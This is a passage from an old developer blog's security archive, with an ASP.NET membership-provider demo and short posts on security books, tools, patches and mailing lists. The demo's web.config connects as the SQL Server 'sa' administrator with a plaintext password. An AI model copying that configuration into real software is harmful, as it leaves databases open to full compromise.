HttpContext.Current.Trace.Write("ValidateUser:exit");

return bSuccess;
}

Step 4: Set it up - web.config

  <appSettings/>
  <connectionStrings>
    <add name="MyNWind" connectionString="Data Source=cbc05vpc\cbc05;Initial Catalog=Northwind;User=sa;Password=P@ssw0rd"/>
  </connectionStrings>
 
  <system.web>
    <membership defaultProvider="SuperDuperMSProv">
      <providers>
        <clear/>
        <add name="SuperDuperMSProv" connectionStringName="MyNWind" type="MyMembershipProvider"/>
      </providers>
    </membership>

Step 5: View the auditing information - default.aspx.cs

The final "UI" looks like this:

The source code is rather simple:

protected void Page_Load(object sender, EventArgs e)
{
MyMembershipUser currentUser = (MyMembershipUser)Membership.GetUser();

Label1.Text = currentUser.FullName;
string lcConnection = ConfigurationManager.ConnectionStrings["MyNWind"].ConnectionString;

SqlConnection conn = new SqlConnection(lcConnection);

SqlCommand cmd = new SqlCommand("select * from myLoginAuditing where username=@username", conn);
cmd.Parameters.AddWithValue("@Username", currentUser.UserName);

conn.Open();

SqlDataReader reader = cmd.ExecuteReader();

GridView1.DataSource = reader;
GridView1.DataBind();

reader.Close();
conn.Close();
}

Done. By the way, did you notice something? Right! Alexander never fell into the trap of SQL Injection.

ExtendingMembershipProviderDemo.zip (5.64 KB)

Categories: 2 Ohhhh | ASP.NET | Community | Security
Monday, 25 July 2005 19:46:16 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 13 July 2005
Yet another security book is coming: The 19 Deadly Sins of Software Security. You can read about its contents on Michael Howard's blog here. I am not yet done with Protect Your Windows Network : From Perimeter to Data by Jesper Johansson and Steve Riley (great site, btw). I definitely do recommend this book to everyone interested in security!
Categories: Books | Security
Wednesday, 13 July 2005 08:16:30 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 12 July 2005
Order a couple of their security posters and place them at strategical locations in your company. Maybe someone should buy this poster for the UK MOD - they keep having their notebooks stolen.
Categories: Security
Tuesday, 12 July 2005 22:05:59 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

Check out the article 10 Immutable Laws of Security on TechNet. A couple of those should get you thinking - I especially like #6.
Categories: Administration | Security
Tuesday, 12 July 2005 21:59:45 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Monday, 11 July 2005
Mark Russinovich (his blog is highly recommended) commented on that book during one of his TechEd Europe talks. The book is written (including) by the guy running rootkit.com, famous for the Hacker Defender rootkit for Windows. Looks like there's yet another book to be added to my backlog for reading this summer <g />.
Categories: Books | Security | this
Monday, 11 July 2005 15:01:12 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 08 July 2005
I'm sitting right now in that session. The speaker is just demoing yet another example which has a SQL Injection vulnerability! The killer: a script callback that uses the params unvetted to dynamically build a SQL string. MS definitely should vet the demos for security problems.
Categories: 2 Ohhhh | ASP.NET | Security | this
Friday, 08 July 2005 12:31:39 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]

 



#  Saturday, 02 July 2005
The new version of MBSA is finally available. Go get it here.
Categories: Cool Download | Security
Saturday, 02 July 2005 08:19:16 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 18 May 2005
The Securing Wireless LANs with PEAP and Passwords solution guide is designed to help small- and medium-sized organizations protect their wireless local access network (LANs). This prescriptive guidance will assist you in planning, deploying, testing, and managing a wireless LAN security infrastructure using Microsoft Windows XP, Windows Server 2003, and Pocket PC 2003. The guide is a companion to the earlier solution guide Securing Wireless LANs – a Certificate Services Solution. However, this updated guide uses passwords to authenticate users and computers to the LAN instead of digital certificates. Download
Categories: Administration | Security
Wednesday, 18 May 2005 12:58:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

A guidance for threat modeling Web applications has been released on the patterns&practices site. A must-read for every Web developer.
Categories: Security
Wednesday, 18 May 2005 10:02:27 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 12 April 2005

Just seen on NTBugtraq, quote from the Web site: SQLRecon performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. Due to the proliferation of personal firewalls, inconsistent network library configurations, and multiple-instance support, SQL Server installations are becoming increasingly difficult to discover, assess, and maintain.

SQLRecon is designed to remedy this problem by combining all known means of SQL Server/MSDE discovery into a single tool which can be used to ferret-out servers you never knew existed on your network so you can properly secure them.

Didn't yet have time to try SQLRecon myself, but sure will.

Categories: Cool Download | Security | SQL Server
Tuesday, 12 April 2005 17:08:54 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 06 April 2005
This site contains links to a variety of resources on IPsec and its support in Windows Server 2003.
Categories: Administration | Security
Wednesday, 06 April 2005 12:00:00 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Saturday, 05 March 2005

After dinner yesterday, we decided to go to B&N which happened to be nearby. Well, I left with two more books to read: The .NET Developer's Guide to Windows Security and Open Source .NET Development: Programming with NAnt, NUnit, NDoc, and More. The former is by Keith Brown, and contains all those things you usually don't find C# samples for easily: for example, to how to modify ACLs - and much, much more.

The second one (by Brian Nantz) on OS tools for .NET development will be a reference for me on the various tools that we do use today, as well as others that we are likely to evaluate. It also contains a brief section (roughly a page) on #develop, which I happen to be the PM for. I would like to set the record straight on a couple of things though:

  • #ziplib is only used to zip the help index XML files
  • #cvslib hasn't been a part of the distribution for a couple of years now. However, it played an extremely vital role in #develop's gestation: the GUI for #cvslib was a prototype for the addin system we later used in #develop.
  • Magic Library - in May last year (Fidalgo Beta 1), it was entirely replaced by the DockPanel Suite. Before that, we already had replaced portions of the Magic widgets with Lutz' CommandBar for .NET.
Categories: Books | Security | this | Use the source Luke
Saturday, 05 March 2005 17:32:08 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Tuesday, 01 March 2005

Note to self: need to install SP1 for ISA 2004. From the download page:

ISA Server 2004 Standard Edition SP1 can be installed directly on computers running ISA Server 2004 Standard edition, and includes:

  • All software updates issued since ISA Server was released to manufacturing.
  • Fixes for common issues reported by customers through Microsoft Product Support Services (PSS).
  • Enhanced stability of the ISA Server services and administration tool in a number of scenarios.

Also check out the readme.

Categories: Security | this
Tuesday, 01 March 2005 07:14:15 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Sunday, 27 February 2005
Categories: .NET | ASP.NET | Security
Sunday, 27 February 2005 02:22:24 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 25 February 2005
NNNNNOOOOooooo......! reminded me of one thing I still needed to do to speed up XP on my new notebook: regsvr32 /u zipfldr.dll.
Categories: Administration | Security | this
Friday, 25 February 2005 02:51:38 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Thursday, 24 February 2005

In the article The 80/20 Rule for Web Application Security, there is one security solution proposed to protect sensitive cookies: adding the httpOnly flag. This attribute prevents cookies from being accessed through client-side script, thus mitigating the risk of cross-site scripting.

All you have to do in ASP.NET 2.0 to take advantage of this security feature is to add the httpCookies element with the httpOnlyCookies attribute set to true to web.config:

<?xml version="1.0" encoding="utf-8"?>
<configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">
    <system.web>
        <httpCookies httpOnlyCookies="true"/>
    </system.web>
</configuration>

That's it - but you are still free to override this on a per-cookie basis.

Categories: 2 Ohhhh | ASP.NET | Security
Thursday, 24 February 2005 06:01:40 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Tuesday, 01 February 2005

The 80/20 Rule for Web Application Security is an article by Jeremiah Grossman, focused on increasing the security without touching the source code. The article identifies the "vital few" security solutions essential to protecting a website:

  • Default server error messages
  • Remove or protect hidden files and directories
  • Web server security add-ons
  • Add httpOnly flag to sensitive cookies
Categories: Administration | IIS | Security
Tuesday, 01 February 2005 11:01:07 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 

A non-programming security topic centered around securing your wireless LAN. This white paper contains instructions to obtain and install a certificate for PEAP-MS-CHAP v2 wireless authentication on the IAS (RADIUS) server and how to set up the clients to trust this certificate.
Categories: Administration | Security
Tuesday, 01 February 2005 08:19:09 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 05 January 2005

TrueCrypt is a free open-source disk encryption software for Windows 2000 thru 2003 (and this indeed includes XP). You can create virtual disks, which, as the application name implies, are encrypted: mount with the correct password - you magically see another volume. Don't have the right password? Enjoy looking at gibberish. A recommended application for laptop users, especially the British public (and secret) services should take note as they tend to loose quite a few laptops per year.

The second application is KeePass, which is nothing more or less than a nice password safe which keeps your secrets locked away (even from you, should you forget the master key). Cool features: it simply runs (no installation required), has a password generator, and does support importing.

Wednesday, 05 January 2005 14:55:28 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 08 December 2004

Not strictly a programming security topic, but useful nonetheless: Attack and penetration testing is a set of techniques and methodologies to test compliance to security policies, and to detect previously unknown vulnerabilities. The overall goal is to limit the points of exposure and to restrict the ability of unknown attackers to gain entry. However, developing an effective attack and penetration testing team presents unique management challenges. This discussion gives some best practice advice and lessons learned from the Microsoft IT experience building and operating an internal attack and penetration testing team. Download

Categories: Administration | Security
Wednesday, 08 December 2004 11:16:25 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 06 December 2004

There is a new hands-on lab for Web Services Enhancements 2.0: Learn how to secure Web services without writing code. Sample code is provided for both C# and VB.NET, so it should fit almost everyone.

Categories: .NET | ASP.NET | Security
Monday, 06 December 2004 18:57:51 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 03 December 2004

Using WSE 2.0? Get SP2. Dont't know what WSE is? Here is a quick overview from the download page:

WSE 2.0 SP2 simplifies the development and deployment of secure Web services by enabling developers and administrators to more easily apply security policies on Web services running on the .NET Framework. Using WSE, Web services communication can be signed and encrypted using Kerberos tickets, X.509 certificates, username/password credentials, and other custom binary and XML-based security tokens. In addition, an enhanced security model provides a policy-driven foundation for securing Web services across trust domains. WSE also supports the ability to establish a trust-issuing service for retrieval and validation of security tokens, as well as the ability to establish more efficient long-running secure communication via secure conversations.

Categories: ASP.NET | Security | Visual Studio
Friday, 03 December 2004 10:28:46 (W. Europe Standard Time, UTC+01:00)  #    Comments [2]

 



#  Wednesday, 24 November 2004

From the abstract: Seth Fogie presents the latest in our series of security audio sessions. Mr Fogie discusses all the major security issues that are affecting Windows Mobile Pocket PC devices. Some of the topics covered include:

  • Worms, trojans and backdoors
  • Insecurities in wireless connectivity
  • Denial of Service attacks
  • Specific problems (ActiveSync, autorun SD/CF cards, buffer overflows)
  • PDA device as an attack platform
  • Tips on securing your PDAs.

The audio session is 13:58 minutes long (Flash required).

Wednesday, 24 November 2004 10:22:36 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Monday, 22 November 2004

Michael Howard did it again in his latest Writing Secure Code column: how you can run as an administrator and access Internet data safely by dropping unnecessary administrative privileges when using any tool to access the Internet (article on MSDN Security Developer Center). Started using the DropMyRights application immediately on my email applications (yes, I'm one of those devs who does run with administrative privileges by default). Really painless. And can save a headache or two.

Monday, 22 November 2004 22:07:49 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Sunday, 24 October 2004

The November issue of MSDN Magazine is completely about security: attack surface, application lockdown, cryptography, trustworthy code, intrusion prevention and much more. If you ain't already a subscriber, make sure you grab at least this issue at your local newsstand.

Categories: Security
Sunday, 24 October 2004 10:54:10 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]

 



#  Monday, 18 October 2004

The Security Risk Management Guide helps customers of all types plan, build, and maintain a successful security risk management program. The guide explains how to conduct each phase of a four-phase risk management program and how to build an ongoing process to measure and drive security risks to an acceptable level. This guide is technology agnostic and references many industry accepted standards for managing security risk. Download

 

Categories: Security
Monday, 18 October 2004 11:48:37 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Sunday, 17 October 2004

Michael Howard has an interesting blog entry on the number of advisories for IIS 6 versus the number of advisories for Apache 2.0.x (advisories that are security-relevant, in case you are wondering). This doesn't make Apache look that good after all.

Categories: IIS | Security
Sunday, 17 October 2004 19:10:02 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Saturday, 16 October 2004

Brian Goldfarb has the details in his blog on Making the ValidatePath HTTP Module easier to deploy. (remember, the canonicalization issue with ASP.NET)

Categories: ASP.NET | Security
Saturday, 16 October 2004 11:30:08 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 15 October 2004

Another MSR (Cambridge) project: The goal of the Samoa Project is to exploit recent theoretical advances in the analysis of security protocols in the practical setting of XML web services. Some early outcomes of this research include an implementation of declarative security attributes for web services and the design of a logic-based approach to checking SOAP-based protocols.

Even if this doesn't sound interesting to you, the site sports a really great resources section with lots of article links, security topics, bloggers and columnists, resource hubs and more. If you are working with Web Services, check this site out!

Categories: .NET | MSR | Security
Friday, 15 October 2004 10:04:38 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 08 October 2004

MS has updated What You Should Know About a Reported Vulnerability in Microsoft ASP.NET with information on the Microsoft ASP.NET ValidatePath Module. This module essentially does what the recommended global.asax fix does - on a machine-wide level. The advantage? Only one install per machine, no developer who could forget to implement the fix, and it also works for applications for which you only have the compiled site. Running on this very Web server.

Categories: Administration | ASP.NET | Security
Friday, 08 October 2004 07:38:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 06 October 2004

Early Tuesday morning last week, I already had a blog entry up with exactly that title. However, I took it down because Scott Guthrie did ask to buy some time for his ASP.NET team which was already working on a fix for the zero-day exploit reported on NTBugtraq. I changed my entry to Two of the most important security mailing lists, an article containing useful advice– especially programmers are usually not subscribed to these lists, and this I consider to be bordering on irresponsible these days.

To get back to the security bug in Forms Authentication: the ASP.NET team has posted a KB article and a security alert. Turn to implementing the workaround options immediately!

An IIS best practice using URLScan for the backslash canonicalization issue found in ASP.NET was brought up independently by Stephan on our German ASP.NET mailing list last Tuesday. Too bad that we had to advise lots of people to install a tool that was readily available for years!

Bootnote: Hadn’t it been a security vulnerability for ASP.NET, I would have never even considered taking my blog entry down (the ASP.NET team is just absolutely fabulous and their support for the community rocks). I flat-out do not believe that one helps the good guys by not telling them about publicly known zero day exploits (NTBugtraq isn’t just any mailing list after all, and shooting the messenger never was a brilliant solution). This is why the German ASP.NET community knew about the sploit before 7:30AM CET on Tuesday. Even if we hadn’t found a workaround, disabling vulnerable sites would still have been a much better choice than being hacked without knowing.

Categories: ASP.NET | Security
Wednesday, 06 October 2004 07:28:25 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 30 September 2004

OWASP (The Open Source Web Application Security Project) has a couple of projects online focused on ASP.NET security issues. Current projects include ANBS (ASP.NET Baseline Security), SAM'SHE (Security Analyzer for Microsoft's Shared Hosting Environments), ANSA (ASP.NET Security Analyzer) as well as the ASP.NET Security Guidelines for designing and deploying secure Web applications using ASP.NET (applicable to IIS 5 & 6).

OWASP .NET Projects Homepage

Categories: .NET | Administration | ASP.NET | Cool Download | Security
Thursday, 30 September 2004 07:48:15 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 29 September 2004

Newsforge has an article online which is excerpted from the book Know Your Enemy: Learning About Security Threats (2nd edition), a highly recommended read even for programmers - both the article (focused on honeypots) and then of course the book. Written by a member of the Honeynet Project, this book teaches you how to study a black hat attack and learn from it. In addition, you get valuable insight into the mindset of black hats and their community.

Categories: Books | Security
Wednesday, 29 September 2004 08:14:56 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 28 September 2004

I'm talking about NTBugtraq and SecurityFocus' BugTraq mailing list. The former is obviously centered on Windows bugs (including security), the latter is for all operating systems and applications - so there might be too much "chatter" for the average Windows administrator / programmer on that one. However, being on those lists can come in handy when nasty security bugs or even zero day exploits are announced.

Categories: Security
Tuesday, 28 September 2004 07:26:46 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 02 September 2004

The patch was available already up front, now the security advisory was published on buqtraq (a list I very much recommend to subscribe to).

Categories: Security
Thursday, 02 September 2004 07:35:27 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 01 September 2004

Cryptography Research put a Q&A online that answers questions around the hash collision attacks that were announced at the CRYPTO 2004 conference (way back in '97 I attended too, wow, the rump sessions were really cool).

Categories: Security
Wednesday, 01 September 2004 20:32:34 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 

Authentication and Access Control Diagnostics 1.0 (more commonly known as AuthDiag) is a tool released by Microsoft aimed at aiding IT professionals and developers at more effectively finding the source of authentication and authorization failures.

AuthDiag 1.0 offers a robust tool that offers a efficient method for troubleshooting authentication on IIS 5.x and 6.0. It will analyze metabase configuration and system-wide policies and warn users of possible points of failure and guide them to resolving the problem. AuthDiag 1.0 also includes a robust monitoring tool called AuthMon designed at capturing a snapshot of the problem while it occurs in real-time. AuthMon is robust and specially designed for IIS servers removing any information not pertinent to the authentication or authorization process.

Download

Categories: Security | IIS
Wednesday, 01 September 2004 10:19:22 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 31 August 2004

NeoWin is running an interview with Bruce Schneier, author of books such as Applied Cryptography or the monthly Crypto-Gram newsletter. His answers are interesting as always, I especially liked the ones to the questions "What do you see as the biggest threat in the IT age?" and "Who would you say should bear the burden of responsibility for security?"

Categories: Security
Tuesday, 31 August 2004 15:52:11 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Saturday, 21 August 2004

The book The .NET Developer's Guide to Windows Security is available for online reading in Keith Brown's wiki. It answers seventy-five questions, of which a .NET programmer better be able to answer quite a few of them! So be sure to check it and bookmark the page for your future programming endeavors.

Categories: Security | .NET
Saturday, 21 August 2004 01:01:42 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 17 August 2004

The new version of MBSA can be found in the Download Center. Be sure to scan for common misconfigurations on your systems.

Categories: Security
Tuesday, 17 August 2004 00:55:55 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Saturday, 14 August 2004
Categories: Security
Saturday, 14 August 2004 15:56:26 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Thursday, 29 July 2004

The Web Application Security Consortium has released a paper (PDF link) on threat classification. Its intention is to clarify and organize the threats to the security of a Web site. The goals of this project:

  • Identify all known web application security classes of attack.
  • Agree on naming for each class of attack.
  • Develop a structured manner to organize the classes of attack.
  • Develop documentation that provides generic descriptions of each class of attack.

Definitely an interesting read if you are concerned about Web site security.

Categories: Newsbites | Security
Thursday, 29 July 2004 08:33:40 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 28 July 2004

The MSR article Why It’s A Bad Idea For Stealth Software To Hide Files had me stumble across a project of MSR, Strider. According to the description, it is "a black-box, state-based, and component-based approach to systems management and diagnostics. The statistical data analyses that we produce and the infrastructures and tools that we build help users manage their systems today and help developers design new operating systems with better manageability tomorrow."

I really like the idea of Strider Ghostbuster that is outlined in the article - to convince you to read it yourself, I'll show the overview diagram of what Ghostbuster does (Figure 1. The ScanDiff approach to exposing file-hiding software [from the aforementioned article]):

Ghostbuster allows you to find rootkits, keyloggers and other malware that hides itself from plain directory listing. How is it done? Perform a directory listing on the infected machine (step #1), boot from a WinPE CD and scan again (step #2), and then compare the two scans (step #3). You'll see immediately what was hidden, and it takes only around 15 minutes to do this - absolutely neat!

Closing words: be sure to check out the References section of the article!

Categories: MSR | Security
Wednesday, 28 July 2004 10:19:16 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Tuesday, 27 July 2004

The book Improving Web Application Security: Threats and Countermeasures (online: Guidelines Corrections) can also be browsed via solutions at a glance. I've been recommending this book for quite some time in the German community, so why not plug it again (and hence start the Security section of my blog).

Categories: Security
Tuesday, 27 July 2004 13:39:18 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



© Copyright 2017 Christoph Wille

newtelligence dasBlog 2.3.9074.18820
Subscribe to this weblog's RSS feed with SharpReader, Radio Userland, NewsGator or any other aggregator listening on port 5335 by clicking this button.   RSS 2.0|Atom 1.0  Send mail to the author(s)

 
Don't contact us via this (fleischfalle@alphasierrapapa.com) email address.